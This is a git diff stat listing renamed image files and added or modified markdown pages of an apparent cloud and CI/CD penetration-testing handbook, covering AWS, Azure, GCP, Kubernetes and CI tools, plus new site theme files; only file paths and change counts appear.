src/images}/image (327).png | Bin .../assets => src/images}/image (328).png | Bin .../assets => src/images}/image (329).png | Bin .../assets => src/images}/image (33).png | Bin .../assets => src/images}/image (330).png | Bin .../assets => src/images}/image (331).png | Bin .../assets => src/images}/image (332).png | Bin .../assets => src/images}/image (333).png | Bin .../assets => src/images}/image (334).png | Bin .../assets => src/images}/image (335).png | Bin .../assets => src/images}/image (336).png | Bin .../assets => src/images}/image (337).png | Bin .../assets => src/images}/image (338).png | Bin .../assets => src/images}/image (339).png | Bin .../assets => src/images}/image (34).png | Bin .../assets => src/images}/image (340).png | Bin .../assets => src/images}/image (341).png | Bin .../assets => src/images}/image (342).png | Bin .../assets => src/images}/image (343).png | Bin .../assets => src/images}/image (344).png | Bin .../assets => src/images}/image (345).png | Bin .../assets => src/images}/image (346).png | Bin .../assets => src/images}/image (347).png | Bin .../assets => src/images}/image (348).png | Bin .../assets => src/images}/image (349).png | Bin .../assets => src/images}/image (35).png | Bin .../assets => src/images}/image (350).png | Bin .../assets => src/images}/image (351).png | Bin .../assets => src/images}/image (352).png | Bin .../assets => src/images}/image (353).png | Bin .../assets => src/images}/image (354).png | Bin .../assets => src/images}/image (355).png | Bin .../assets => src/images}/image (356).png | Bin .../assets => src/images}/image (36).png | Bin .../assets => src/images}/image (37).png | Bin .../assets => src/images}/image (38) (1).png | Bin .../assets => src/images}/image (38).png | Bin .../assets => src/images}/image (39) (1).png | Bin .../assets => src/images}/image (39).png | Bin ...ge (4) (1) (1) (1) (1) (1) (1) (1) (1).png | Bin .../image (4) (1) (1) (1) (1) (1) (1) (1).png | Bin .../image (4) (1) (1) (1) (1) (1) (1).png | Bin .../images}/image (4) (1) (1) (1) (1) (1).png | Bin .../images}/image (4) (1) (1) (1) (1).png | Bin .../images}/image (4) (1) (1) (1).png | Bin .../images}/image (4) (1) (1).png | Bin .../images}/image (4) (1) (2).png | Bin .../images}/image (4) (1) (3).png | Bin .../assets => src/images}/image (4) (1).png | Bin .../images}/image (4) (2) (1).png | Bin .../assets => src/images}/image (4) (2).png | Bin .../assets => src/images}/image (4) (3).png | Bin .../assets => src/images}/image (4) (4).png | Bin .../assets => src/images}/image (4) (5).png | Bin .../assets => src/images}/image (4) (6).png | Bin .../assets => src/images}/image (4) (7).png | Bin {.gitbook/assets => src/images}/image (4).png | Bin .../assets => src/images}/image (40).png | Bin .../assets => src/images}/image (41).png | Bin .../assets => src/images}/image (42).png | Bin .../assets => src/images}/image (43).png | Bin .../assets => src/images}/image (44).png | Bin .../assets => src/images}/image (45).png | Bin .../assets => src/images}/image (46).png | Bin .../assets => src/images}/image (47).png | Bin .../assets => src/images}/image (48).png | Bin .../assets => src/images}/image (49).png | Bin .../images}/image (5) (1) (1) (1) (1) (1).png | Bin .../images}/image (5) (1) (1) (1) (1).png | Bin .../images}/image (5) (1) (1) (1).png | Bin .../images}/image (5) (1) (1) (2).png | Bin .../images}/image (5) (1) (1).png | Bin .../assets => src/images}/image (5) (1).png | Bin .../images}/image (5) (2) (1).png | Bin .../assets => src/images}/image (5) (2).png | Bin .../assets => src/images}/image (5) (3).png | Bin .../assets => src/images}/image (5) (4).png | Bin {.gitbook/assets => src/images}/image (5).png | Bin .../assets => src/images}/image (50).png | Bin .../assets => src/images}/image (51).png | Bin .../assets => src/images}/image (52).png | Bin .../assets => src/images}/image (53).png | Bin .../assets => src/images}/image (54).png | Bin .../assets => src/images}/image (55).png | Bin .../assets => src/images}/image (56).png | Bin .../assets => src/images}/image (57).png | Bin .../assets => src/images}/image (58).png | Bin .../assets => src/images}/image (59).png | Bin .../images}/image (6) (1) (1) (1).png | Bin .../images}/image (6) (1) (1).png | Bin .../images}/image (6) (1) (2).png | Bin .../assets => src/images}/image (6) (1).png | Bin .../assets => src/images}/image (6) (2).png | Bin .../assets => src/images}/image (6) (3).png | Bin {.gitbook/assets => src/images}/image (6).png | Bin .../assets => src/images}/image (60).png | Bin .../assets => src/images}/image (61).png | Bin .../assets => src/images}/image (62).png | Bin .../assets => src/images}/image (63).png | Bin .../assets => src/images}/image (64).png | Bin .../assets => src/images}/image (65).png | Bin .../assets => src/images}/image (66).png | Bin .../assets => src/images}/image (67).png | Bin .../assets => src/images}/image (68).png | Bin .../assets => src/images}/image (69).png | Bin .../images}/image (7) (1) (1) (1).png | Bin .../images}/image (7) (1) (1) (2).png | Bin .../images}/image (7) (1) (1).png | Bin .../images}/image (7) (1) (2) (1).png | Bin .../images}/image (7) (1) (2).png | Bin .../assets => src/images}/image (7) (1).png | Bin .../assets => src/images}/image (7) (2).png | Bin {.gitbook/assets => src/images}/image (7).png | Bin .../assets => src/images}/image (70).png | Bin .../assets => src/images}/image (71).png | Bin .../assets => src/images}/image (72).png | Bin .../assets => src/images}/image (73).png | Bin .../assets => src/images}/image (74).png | Bin .../assets => src/images}/image (75).png | Bin .../assets => src/images}/image (76).png | Bin .../assets => src/images}/image (77).png | Bin .../assets => src/images}/image (78).png | Bin .../assets => src/images}/image (79).png | Bin .../images}/image (8) (1) (1) (1) (1) (1).png | Bin .../images}/image (8) (1) (1) (1) (1).png | Bin .../images}/image (8) (1) (1) (1).png | Bin .../images}/image (8) (1) (1).png | Bin .../assets => src/images}/image (8) (1).png | Bin .../assets => src/images}/image (8) (2).png | Bin .../assets => src/images}/image (8) (3).png | Bin {.gitbook/assets => src/images}/image (8).png | Bin .../assets => src/images}/image (80).png | Bin .../assets => src/images}/image (81).png | Bin .../assets => src/images}/image (82).png | Bin .../assets => src/images}/image (83) (1).png | Bin .../assets => src/images}/image (83).png | Bin .../assets => src/images}/image (84).png | Bin .../assets => src/images}/image (85) (1).png | Bin .../assets => src/images}/image (85).png | Bin .../assets => src/images}/image (86).png | Bin .../assets => src/images}/image (87) (1).png | Bin .../assets => src/images}/image (87).png | Bin .../assets => src/images}/image (88).png | Bin .../assets => src/images}/image (89) (1).png | Bin .../assets => src/images}/image (89).png | Bin .../images}/image (9) (1) (1) (1) (1).png | Bin .../images}/image (9) (1) (1) (1).png | Bin .../images}/image (9) (1) (1).png | Bin .../assets => src/images}/image (9) (1).png | Bin .../assets => src/images}/image (9) (2).png | Bin {.gitbook/assets => src/images}/image (9).png | Bin .../assets => src/images}/image (90).png | Bin .../assets => src/images}/image (91).png | Bin .../images}/image (92) (1) (1).png | Bin .../assets => src/images}/image (92) (1).png | Bin .../assets => src/images}/image (92).png | Bin .../assets => src/images}/image (93).png | Bin .../assets => src/images}/image (94).png | Bin .../assets => src/images}/image (95).png | Bin .../assets => src/images}/image (96).png | Bin .../assets => src/images}/image (97).png | Bin .../assets => src/images}/image (98).png | Bin .../assets => src/images}/image (99).png | Bin {.gitbook/assets => src/images}/image.png | Bin ...enshift-missing-service-account-image1.png | Bin ...enshift-missing-service-account-image2.png | Bin src/images/sponsor_8ksec.png | Bin 0 -> 14775 bytes src/images/sponsor_hackenproof.jpeg | Bin 0 -> 4251 bytes src/images/sponsor_intigriti.png | Bin 0 -> 28251 bytes src/images/sponsor_pentesttools.webp | Bin 0 -> 3286 bytes src/images/sponsor_rootedcon.png | Bin 0 -> 24857 bytes src/images/sponsor_stm.png | Bin 0 -> 5481 bytes src/images/sponsor_trickest.jpeg | Bin 0 -> 4237 bytes ...m-cloud-document-4-5875069018120918586.jpg | Bin ...oud-photo-size-4-5780773316536156543-x.jpg | Bin ...oud-photo-size-4-5782633230648853886-y.jpg | Bin ...oud-photo-size-4-5920521132757336440-y.jpg | Bin ...oud-photo-size-4-6044191430395675441-x.jpg | Bin ...ower-awx-automation-controller-security.md | 142 +-- .../apache-airflow-security/README.md | 58 +- .../airflow-configuration.md | 111 ++ .../apache-airflow-security/airflow-rbac.md | 50 +- .../pentesting-ci-cd}/atlantis-security.md | 220 ++-- .../pentesting-ci-cd}/circleci-security.md | 101 +- .../cloudflare-security/README.md | 134 ++ .../cloudflare-security/cloudflare-domains.md | 133 ++ .../cloudflare-zero-trust-network.md | 61 + .../concourse-security/README.md | 33 + .../concourse-architecture.md | 38 + .../concourse-enumeration-and-attacks.md | 238 ++-- .../concourse-lab-creation.md | 98 +- .../gitea-security/README.md | 79 +- .../gitea-security/basic-gitea-information.md | 103 ++ .../github-security/README.md | 195 ++- .../abusing-github-actions/README.md | 292 ++--- .../gh-actions-artifact-poisoning.md | 0 .../gh-actions-cache-poisoning.md | 0 .../gh-actions-context-script-injections.md | 0 .../accessible-deleted-data-in-github.md | 56 + .../basic-github-information.md | 203 ++- .../jenkins-security/README.md | 173 ++- .../basic-jenkins-information.md | 78 +- ...itrary-file-read-to-rce-via-remember-me.md | 105 ++ .../jenkins-dumping-secrets-from-groovy.md | 35 +- ...jenkins-rce-creating-modifying-pipeline.md | 39 + .../jenkins-rce-creating-modifying-project.md | 36 + .../jenkins-rce-with-groovy-script.md | 63 + .../pentesting-ci-cd}/okta-security/README.md | 81 +- .../okta-security/okta-hardening.md | 60 +- .../pentesting-ci-cd-methodology.md | 113 +- .../serverless.com-security.md | 502 ++++---- .../pentesting-ci-cd}/supabase-security.md | 84 +- .../pentesting-ci-cd}/terraform-security.md | 121 +- src/pentesting-ci-cd/todo.md | 16 + .../travisci-security/README.md | 65 + .../basic-travisci-information.md | 44 +- src/pentesting-ci-cd/vercel-security.md | 437 +++++++ .../pentesting-cloud}/aws-security/README.md | 209 ++-- .../aws-basic-information/README.md | 170 ++- .../aws-federation-abuse.md | 82 +- .../aws-permissions-for-a-pentest.md | 17 + .../aws-security/aws-persistence/README.md | 0 .../aws-api-gateway-persistence.md | 32 + .../aws-cognito-persistence.md | 42 + .../aws-dynamodb-persistence.md | 63 + .../aws-persistence/aws-ec2-persistence.md | 54 + .../aws-persistence/aws-ecr-persistence.md | 97 ++ .../aws-persistence/aws-ecs-persistence.md | 51 +- .../aws-persistence/aws-efs-persistence.md | 21 + .../aws-elastic-beanstalk-persistence.md | 41 +- .../aws-persistence/aws-iam-persistence.md | 49 + .../aws-persistence/aws-kms-persistence.md | 39 + .../aws-lambda-persistence/README.md | 64 + .../aws-abusing-lambda-extensions.md | 42 + .../aws-lambda-layers-persistence.md | 66 +- .../aws-lightsail-persistence.md | 33 + .../aws-persistence/aws-rds-persistence.md | 31 + .../aws-persistence/aws-s3-persistence.md | 25 + .../aws-secrets-manager-persistence.md | 53 + .../aws-persistence/aws-sns-persistence.md | 81 ++ .../aws-persistence/aws-sqs-persistence.md | 39 + .../aws-persistence/aws-ssm-perssitence.md | 0 .../aws-step-functions-persistence.md | 21 + .../aws-persistence/aws-sts-persistence.md | 41 +- .../aws-post-exploitation/README.md | 0 .../aws-api-gateway-post-exploitation.md | 73 +- .../aws-cloudfront-post-exploitation.md | 31 + .../aws-codebuild-post-exploitation/README.md | 84 ++ .../aws-codebuild-token-leakage.md | 188 +++ .../aws-control-tower-post-exploitation.md | 20 + .../aws-dlm-post-exploitation.md | 30 +- .../aws-dynamodb-post-exploitation.md | 127 +- .../README.md | 226 ++-- .../aws-ebs-snapshot-dump.md | 55 +- .../aws-malicious-vpc-mirror.md | 15 + .../aws-ecr-post-exploitation.md | 44 +- .../aws-ecs-post-exploitation.md | 63 + .../aws-efs-post-exploitation.md | 54 + .../aws-eks-post-exploitation.md | 115 +- ...aws-elastic-beanstalk-post-exploitation.md | 80 ++ .../aws-iam-post-exploitation.md | 103 ++ .../aws-kms-post-exploitation.md | 133 ++ .../aws-lambda-post-exploitation/README.md | 29 + .../aws-warm-lambda-persistence.md | 63 + .../aws-lightsail-post-exploitation.md | 30 + .../aws-organizations-post-exploitation.md | 19 + .../aws-rds-post-exploitation.md | 49 +- .../aws-s3-post-exploitation.md | 36 +- .../aws-secrets-manager-post-exploitation.md | 49 + .../aws-ses-post-exploitation.md | 83 ++ .../aws-sns-post-exploitation.md | 42 +- .../aws-sqs-post-exploitation.md | 36 +- ...sso-and-identitystore-post-exploitation.md | 25 + .../aws-stepfunctions-post-exploitation.md | 74 ++ .../aws-sts-post-exploitation.md | 54 +- .../aws-vpn-post-exploitation.md | 13 + .../aws-privilege-escalation/README.md | 23 + .../aws-apigateway-privesc.md | 57 +- .../aws-chime-privesc.md | 9 + .../aws-cloudformation-privesc/README.md | 46 +- ...stack-and-cloudformation-describestacks.md | 81 ++ .../aws-codebuild-privesc.md | 120 +- .../aws-codepipeline-privesc.md | 37 + .../aws-codestar-privesc/README.md | 73 ++ ...ateproject-codestar-associateteammember.md | 81 ++ .../iam-passrole-codestar-createproject.md | 88 ++ .../aws-cognito-privesc.md | 48 +- .../aws-datapipeline-privesc.md | 74 ++ .../aws-directory-services-privesc.md | 34 + .../aws-dynamodb-privesc.md | 23 + .../aws-ebs-privesc.md | 27 + .../aws-ec2-privesc.md | 80 +- .../aws-ecr-privesc.md | 108 ++ .../aws-ecs-privesc.md | 72 +- .../aws-efs-privesc.md | 38 +- .../aws-elastic-beanstalk-privesc.md | 143 +-- .../aws-emr-privesc.md | 64 + .../aws-privilege-escalation/aws-gamelift.md | 18 + .../aws-glue-privesc.md | 32 +- .../aws-iam-privesc.md | 93 +- .../aws-kms-privesc.md | 122 ++ .../aws-lambda-privesc.md | 75 +- .../aws-lightsail-privesc.md | 47 +- .../aws-mediapackage-privesc.md | 25 + .../aws-mq-privesc.md | 49 + .../aws-msk-privesc.md | 24 + .../aws-organizations-prinvesc.md | 18 + .../aws-rds-privesc.md | 83 +- .../aws-redshift-privesc.md | 107 ++ .../aws-s3-privesc.md | 75 +- .../aws-sagemaker-privesc.md | 83 +- .../aws-secrets-manager-privesc.md | 51 + .../aws-sns-privesc.md | 43 + .../aws-sqs-privesc.md | 46 + .../aws-ssm-privesc.md | 49 +- .../aws-sso-and-identitystore-privesc.md | 70 +- .../aws-stepfunctions-privesc.md | 94 +- .../aws-sts-privesc.md | 122 ++ .../aws-workdocs-privesc.md | 10 +- .../eventbridgescheduler-privesc.md | 49 + ...acm-pca-issuecertificate-acm-pca-getcer.md | 32 + .../aws-security/aws-services/README.md | 31 + .../aws-services/aws-api-gateway-enum.md | 100 +- ...m-and-private-certificate-authority-pca.md | 30 +- .../aws-cloudformation-and-codestar-enum.md | 75 ++ .../aws-services/aws-cloudfront-enum.md | 44 + .../aws-services/aws-cloudhsm-enum.md | 30 +- .../aws-services/aws-codebuild-enum.md | 76 ++ .../aws-services/aws-cognito-enum/README.md | 102 ++ .../cognito-identity-pools.md | 82 +- .../aws-cognito-enum/cognito-user-pools.md | 173 ++- ...e-codepipeline-codebuild-and-codecommit.md | 52 +- .../aws-directory-services-workdocs-enum.md | 68 +- .../aws-services/aws-documentdb-enum.md | 42 + .../aws-services/aws-dynamodb-enum.md | 80 +- .../README.md | 146 +-- .../aws-nitro-enum.md | 73 +- ...ws-vpc-and-networking-basic-information.md | 180 ++- .../aws-security/aws-services/aws-ecr-enum.md | 102 ++ .../aws-security/aws-services/aws-ecs-enum.md | 82 ++ .../aws-security/aws-services/aws-efs-enum.md | 102 +- .../aws-security/aws-services/aws-eks-enum.md | 46 + .../aws-elastic-beanstalk-enum.md | 101 +- .../aws-services/aws-elasticache.md | 45 + .../aws-security/aws-services/aws-emr-enum.md | 60 + .../aws-security/aws-services/aws-iam-enum.md | 168 +-- .../aws-kinesis-data-firehose-enum.md | 51 + .../aws-security/aws-services/aws-kms-enum.md | 158 +++ .../aws-services/aws-lambda-enum.md | 72 +- .../aws-services/aws-lightsail-enum.md | 59 + .../aws-security/aws-services/aws-mq-enum.md | 76 ++ .../aws-security/aws-services/aws-msk-enum.md | 52 +- .../aws-services/aws-organizations-enum.md | 47 + .../aws-services/aws-other-services-enum.md | 24 + .../aws-services/aws-redshift-enum.md | 40 +- .../aws-relational-database-rds-enum.md | 100 +- .../aws-services/aws-route53-enum.md | 31 + .../aws-s3-athena-and-glacier-enum.md | 147 +-- .../aws-services/aws-secrets-manager-enum.md | 50 + .../README.md | 0 .../aws-cloudtrail-enum.md | 157 +-- .../aws-cloudwatch-enum.md | 215 ++-- .../aws-config-enum.md | 56 +- .../aws-control-tower-enum.md | 42 + .../aws-cost-explorer-enum.md | 15 + .../aws-detective-enum.md | 16 + .../aws-firewall-manager-enum.md | 119 +- .../aws-guardduty-enum.md | 127 +- .../aws-inspector-enum.md | 173 ++- .../aws-macie-enum.md | 118 ++ .../aws-security-hub-enum.md | 63 + .../aws-shield-enum.md | 15 + .../aws-trusted-advisor-enum.md | 71 ++ .../aws-waf-enum.md | 284 ++--- .../aws-security/aws-services/aws-ses-enum.md | 43 +- .../aws-security/aws-services/aws-sns-enum.md | 79 ++ .../aws-services/aws-sqs-and-sns-enum.md | 53 + .../aws-services/aws-stepfunctions-enum.md | 295 +++-- .../aws-security/aws-services/aws-sts-enum.md | 100 ++ .../aws-services/eventbridgescheduler-enum.md | 81 ++ .../aws-unauthenticated-enum-access/README.md | 54 + .../aws-accounts-unauthenticated-enum.md | 45 + .../aws-api-gateway-unauthenticated-enum.md | 56 + .../aws-cloudfront-unauthenticated-enum.md | 11 + .../aws-codebuild-unauthenticated-access.md | 35 + .../aws-cognito-unauthenticated-enum.md | 40 +- .../aws-documentdb-enum.md | 11 + .../aws-dynamodb-unauthenticated-access.md | 15 + .../aws-ec2-unauthenticated-enum.md | 60 + .../aws-ecr-unauthenticated-enum.md | 34 + .../aws-ecs-unauthenticated-enum.md | 25 + ...-elastic-beanstalk-unauthenticated-enum.md | 37 + .../aws-elasticsearch-unauthenticated-enum.md | 12 + .../aws-iam-and-sts-unauthenticated-enum.md | 137 +-- ...ity-center-and-sso-unauthenticated-enum.md | 48 +- .../aws-iot-unauthenticated-enum.md | 13 + .../aws-kinesis-video-unauthenticated-enum.md | 11 + .../aws-lambda-unauthenticated-access.md | 22 + .../aws-media-unauthenticated-enum.md | 13 + .../aws-mq-unauthenticated-enum.md | 22 + .../aws-msk-unauthenticated-enum.md | 18 + .../aws-rds-unauthenticated-enum.md | 44 + .../aws-redshift-unauthenticated-enum.md | 11 + .../aws-s3-unauthenticated-enum.md | 85 +- .../aws-sns-unauthenticated-enum.md | 21 + .../aws-sqs-unauthenticated-enum.md | 23 + .../azure-security/README.md | 171 ++- .../az-basic-information/README.md | 323 +++-- .../az-tokens-and-public-applications.md | 120 +- .../azure-security/az-device-registration.md | 109 ++ .../azure-security/az-enumeration-tools.md | 79 +- .../README.md | 65 + .../az-arc-vulnerable-gpo-deploy-script.md | 32 +- .../az-local-cloud-credentials.md | 39 + .../az-pass-the-certificate.md | 39 + .../az-pass-the-cookie.md | 37 + ...g-primary-refresh-token-microsoft-entra.md | 7 + .../az-primary-refresh-token-prt.md | 7 + .../az-processes-memory-access-token.md | 37 + .../README.md | 60 + .../az-cloud-kerberos-trust.md | 47 +- .../az-default-applications.md | 9 + .../az-synchronising-new-users.md | 32 + .../federation.md | 100 +- .../phs-password-hash-sync.md | 60 +- .../pta-pass-through-authentication.md | 70 ++ .../seamless-sso.md | 78 +- .../pass-the-prt.md | 109 +- .../az-permissions-for-a-pentest.md | 7 + .../azure-security/az-persistence/README.md | 38 +- .../az-persistence/az-queue-persistance.md | 31 + .../az-persistence/az-storage-persistence.md | 41 + .../az-persistence/az-vms-persistence.md | 25 + .../az-post-exploitation/README.md | 0 .../az-blob-storage-post-exploitation.md | 45 + .../az-file-share-post-exploitation.md | 48 + .../az-function-apps-post-exploitation.md | 17 + .../az-key-vault-post-exploitation.md | 46 +- .../az-queue-post-exploitation.md | 56 +- .../az-servicebus-post-exploitation.md | 75 +- .../az-sql-post-exploitation.md | 50 +- .../az-table-storage-post-exploitation.md | 64 + .../az-vms-and-network-post-exploitation.md | 63 +- .../az-privilege-escalation/README.md | 0 .../az-app-services-privesc.md | 39 + .../az-authorization-privesc.md | 59 +- .../az-entraid-privesc/README.md | 101 +- ...-conditional-access-policies-mfa-bypass.md | 80 +- .../az-entraid-privesc/dynamic-groups.md | 50 + .../az-functions-app-privesc.md | 124 +- .../az-key-vault-privesc.md | 34 + .../az-queue-privesc.md | 52 +- .../az-servicebus-privesc.md | 53 +- .../az-privilege-escalation/az-sql-privesc.md | 57 +- .../az-storage-privesc.md | 68 +- ...az-virtual-machines-and-network-privesc.md | 118 +- .../azure-security/az-services/README.md | 73 ++ .../azure-security/az-services/az-acr.md | 52 + .../az-services/az-app-service.md | 86 +- .../az-services/az-application-proxy.md | 40 + .../az-services/az-arm-templates.md | 31 + .../az-automation-account/README.md | 90 +- .../az-state-configuration-rce.md | 65 + .../azure-security/az-services/az-azuread.md | 420 ++++--- .../az-services/az-file-shares.md | 139 +-- .../az-services/az-function-apps.md | 144 +-- .../az-services/az-logic-apps.md | 56 +- ...roups-subscriptions-and-resource-groups.md | 56 + .../az-services/az-queue-enum.md | 95 ++ .../az-services/az-servicebus-enum.md | 77 +- .../azure-security/az-services/az-sql.md | 136 +-- .../azure-security/az-services/az-storage.md | 258 ++-- .../az-services/az-table-storage.md | 109 ++ .../azure-security/az-services/intune.md | 31 + .../azure-security/az-services/keyvault.md | 92 +- .../azure-security/az-services/vms/README.md | 349 +++--- .../az-services/vms/az-azure-network.md | 303 +++-- .../README.md | 59 +- .../az-device-code-authentication-phishing.md | 7 + .../az-oauth-apps-phishing.md | 84 +- .../az-password-spraying.md | 35 + .../az-vms-unath.md | 41 + .../digital-ocean-pentesting/README.md | 43 + .../do-basic-information.md | 40 +- .../do-permissions-for-a-pentest.md | 7 + .../do-services/README.md | 19 + .../do-services/do-apps.md | 34 + .../do-services/do-container-registry.md | 33 + .../do-services/do-databases.md | 43 + .../do-services/do-droplets.md | 46 +- .../do-services/do-functions.md | 60 + .../do-services/do-images.md | 19 + .../do-services/do-kubernetes-doks.md | 39 + .../do-services/do-networking.md | 45 + .../do-services/do-projects.md | 23 + .../do-services/do-spaces.md | 46 + .../do-services/do-volumes.md | 15 + .../pentesting-cloud}/gcp-security/README.md | 158 +-- .../gcp-basic-information/README.md | 136 +-- .../gcp-federation-abuse.md | 153 +++ .../gcp-permissions-for-a-pentest.md | 0 .../gcp-security/gcp-persistence/README.md | 0 .../gcp-api-keys-persistence.md | 21 + .../gcp-app-engine-persistence.md | 21 + .../gcp-artifact-registry-persistence.md | 42 + .../gcp-bigquery-persistence.md | 21 + .../gcp-cloud-functions-persistence.md | 19 + .../gcp-cloud-run-persistence.md | 25 + .../gcp-cloud-shell-persistence.md | 69 ++ .../gcp-cloud-sql-persistence.md | 37 + .../gcp-compute-persistence.md | 19 + .../gcp-dataflow-persistence.md | 53 + .../gcp-filestore-persistence.md | 21 + .../gcp-logging-persistence.md | 21 + .../gcp-non-svc-persistance.md | 55 +- .../gcp-secret-manager-persistence.md | 22 + .../gcp-storage-persistence.md | 38 + .../gcp-post-exploitation/README.md | 0 .../gcp-app-engine-post-exploitation.md | 43 + ...gcp-artifact-registry-post-exploitation.md | 21 + .../gcp-cloud-build-post-exploitation.md | 29 + .../gcp-cloud-functions-post-exploitation.md | 35 +- .../gcp-cloud-run-post-exploitation.md | 23 + .../gcp-cloud-shell-post-exploitation.md | 46 +- .../gcp-cloud-sql-post-exploitation.md | 38 +- .../gcp-compute-post-exploitation.md | 73 +- .../gcp-filestore-post-exploitation.md | 100 ++ .../gcp-iam-post-exploitation.md | 29 + .../gcp-kms-post-exploitation.md | 50 +- .../gcp-logging-post-exploitation.md | 60 +- .../gcp-monitoring-post-exploitation.md | 114 ++ .../gcp-pub-sub-post-exploitation.md | 70 +- .../gcp-secretmanager-post-exploitation.md | 22 + .../gcp-security-post-exploitation.md | 58 + .../gcp-storage-post-exploitation.md | 34 + .../gcp-workflows-post-exploitation.md | 21 + .../gcp-privilege-escalation/README.md | 65 +- .../gcp-apikeys-privesc.md | 78 ++ .../gcp-appengine-privesc.md | 51 +- .../gcp-artifact-registry-privesc.md | 173 +++ .../gcp-batch-privesc.md | 58 + .../gcp-bigquery-privesc.md | 51 +- .../gcp-clientauthconfig-privesc.md | 26 + .../gcp-cloudbuild-privesc.md | 42 +- .../gcp-cloudfunctions-privesc.md | 63 +- .../gcp-cloudidentity-privesc.md | 34 + .../gcp-cloudscheduler-privesc.md | 50 +- .../gcp-composer-privesc.md | 52 +- .../gcp-compute-privesc/README.md | 71 +- .../gcp-add-custom-ssh-metadata.md | 100 ++ .../gcp-container-privesc.md | 91 ++ .../gcp-deploymentmaneger-privesc.md | 29 + .../gcp-iam-privesc.md | 52 +- .../gcp-kms-privesc.md | 40 +- ...local-privilege-escalation-ssh-pivoting.md | 54 +- .../gcp-misc-perms-privesc.md | 25 + .../gcp-network-docker-escape.md | 34 +- .../gcp-orgpolicy-privesc.md | 25 + .../gcp-pubsub-privesc.md | 37 + .../gcp-resourcemanager-privesc.md | 19 + .../gcp-run-privesc.md | 40 +- .../gcp-secretmanager-privesc.md | 38 + .../gcp-serviceusage-privesc.md | 29 +- .../gcp-sourcerepos-privesc.md | 87 ++ .../gcp-storage-privesc.md | 71 +- .../gcp-workflows-privesc.md | 62 +- .../gcp-security/gcp-services/README.md | 0 .../gcp-services/gcp-ai-platform-enum.md | 22 + .../gcp-services/gcp-api-keys-enum.md | 44 + .../gcp-services/gcp-app-engine-enum.md | 65 +- .../gcp-artifact-registry-enum.md | 68 +- .../gcp-services/gcp-batch-enum.md | 35 + .../gcp-services/gcp-bigquery-enum.md | 93 +- .../gcp-services/gcp-bigtable-enum.md | 32 + .../gcp-services/gcp-cloud-build-enum.md | 171 +++ .../gcp-services/gcp-cloud-functions-enum.md | 108 ++ .../gcp-services/gcp-cloud-run-enum.md | 111 ++ .../gcp-services/gcp-cloud-scheduler-enum.md | 46 + .../gcp-services/gcp-cloud-shell-enum.md | 28 + .../gcp-services/gcp-cloud-sql-enum.md | 89 ++ .../gcp-services/gcp-composer-enum.md | 43 + .../gcp-compute-instances-enum/README.md | 93 +- .../gcp-compute-instance.md | 74 +- .../gcp-vpc-and-networking.md | 69 +- .../gcp-containers-gke-and-composer-enum.md | 50 +- .../gcp-security/gcp-services/gcp-dns-enum.md | 25 + .../gcp-services/gcp-filestore-enum.md | 74 ++ .../gcp-services/gcp-firebase-enum.md | 40 +- .../gcp-services/gcp-firestore-enum.md | 17 + .../gcp-iam-and-org-policies-enum.md | 126 +- .../gcp-security/gcp-services/gcp-kms-enum.md | 66 +- .../gcp-services/gcp-logging-enum.md | 105 +- .../gcp-services/gcp-memorystore-enum.md | 21 + .../gcp-services/gcp-monitoring-enum.md | 57 + .../gcp-security/gcp-services/gcp-pub-sub.md | 48 +- .../gcp-services/gcp-secrets-manager-enum.md | 53 + .../gcp-services/gcp-security-enum.md | 114 +- .../gcp-source-repositories-enum.md | 67 + .../gcp-services/gcp-spanner-enum.md | 31 + .../gcp-services/gcp-stackdriver-enum.md | 33 + .../gcp-services/gcp-storage-enum.md | 73 +- .../gcp-services/gcp-workflows-enum.md | 38 + .../gcp-to-workspace-pivoting/README.md | 88 +- ...cp-understanding-domain-wide-delegation.md | 36 +- .../README.md | 18 + .../gcp-api-keys-unauthenticated-enum.md | 52 + .../gcp-app-engine-unauthenticated-enum.md | 25 + ...-artifact-registry-unauthenticated-enum.md | 21 + .../gcp-cloud-build-unauthenticated-enum.md | 42 + ...cp-cloud-functions-unauthenticated-enum.md | 77 ++ .../gcp-cloud-run-unauthenticated-enum.md | 59 + .../gcp-cloud-sql-unauthenticated-enum.md | 25 + .../gcp-compute-unauthenticated-enum.md | 25 + ...principals-and-org-unauthenticated-enum.md | 42 +- ...ource-repositories-unauthenticated-enum.md | 20 + .../README.md | 73 ++ ...gcp-public-buckets-privilege-escalation.md | 31 + .../ibm-cloud-pentesting/README.md | 38 + .../ibm-basic-information.md | 72 ++ .../ibm-hyper-protect-crypto-services.md | 30 +- .../ibm-hyper-protect-virtual-server.md | 30 +- .../kubernetes-security/README.md | 80 ++ .../README.md | 359 +++--- .../kubernetes-roles-abuse-lab.md | 61 +- .../pod-escape-privileges.md | 49 + .../attacking-kubernetes-from-inside-a-pod.md | 159 +-- .../exposing-services-in-kubernetes.md | 107 +- .../kubernetes-security/kubernetes-basics.md | 285 ++--- .../kubernetes-enumeration.md | 360 +++--- .../kubernetes-external-secrets-operator.md | 46 +- .../kubernetes-hardening/README.md | 96 +- .../kubernetes-securitycontext-s.md | 80 +- .../kubernetes-kyverno/README.md | 0 .../kubernetes-kyverno-bypass.md | 24 +- .../kubernetes-namespace-escalation.md | 33 + .../kubernetes-network-attacks.md | 151 +-- .../kubernetes-opa-gatekeeper/README.md | 0 .../kubernetes-opa-gatekeeper-bypass.md | 18 +- .../kubernetes-pivoting-to-clouds.md | 141 +-- ...bernetes-role-based-access-control-rbac.md | 107 +- ...bernetes-validatingwebhookconfiguration.md | 50 +- .../pentesting-kubernetes-services/README.md | 63 +- ...ubelet-authentication-and-authorization.md | 66 +- .../openshift-pentesting/README.md | 19 + .../openshift-basic-information.md | 16 +- .../openshift-jenkins/README.md | 6 +- .../openshift-jenkins-build-overrides.md | 0 .../openshift-privilege-escalation/README.md | 19 + .../openshift-missing-service-account.md | 8 +- .../openshift-scc-bypass.md | 80 +- .../openshift-tekton.md | 13 +- .../openshift-pentesting/openshift-scc.md | 16 +- .../pentesting-cloud-methodology.md | 236 ++-- .../workspace-security/README.md | 73 ++ .../gws-google-platforms-phishing/README.md | 123 +- .../gws-app-scripts.md | 235 ++++ .../workspace-security/gws-persistence.md | 182 +++ .../gws-post-exploitation.md | 46 +- .../README.md | 58 + .../gcds-google-cloud-directory-sync.md | 197 ++- ...-google-credential-provider-for-windows.md | 304 ++--- .../gps-google-password-sync.md | 203 ++- .../gws-admin-directory-sync.md | 53 +- theme/book.js | 735 +++++++++++ theme/css/chrome.css | 1085 +++++++++++++++++ theme/css/general.css | 242 ++++ theme/css/print.css | 50 + theme/css/variables.css | 484 ++++++++ theme/favicon.png | Bin 0 -> 14122 bytes theme/favicon.svg | 21 + 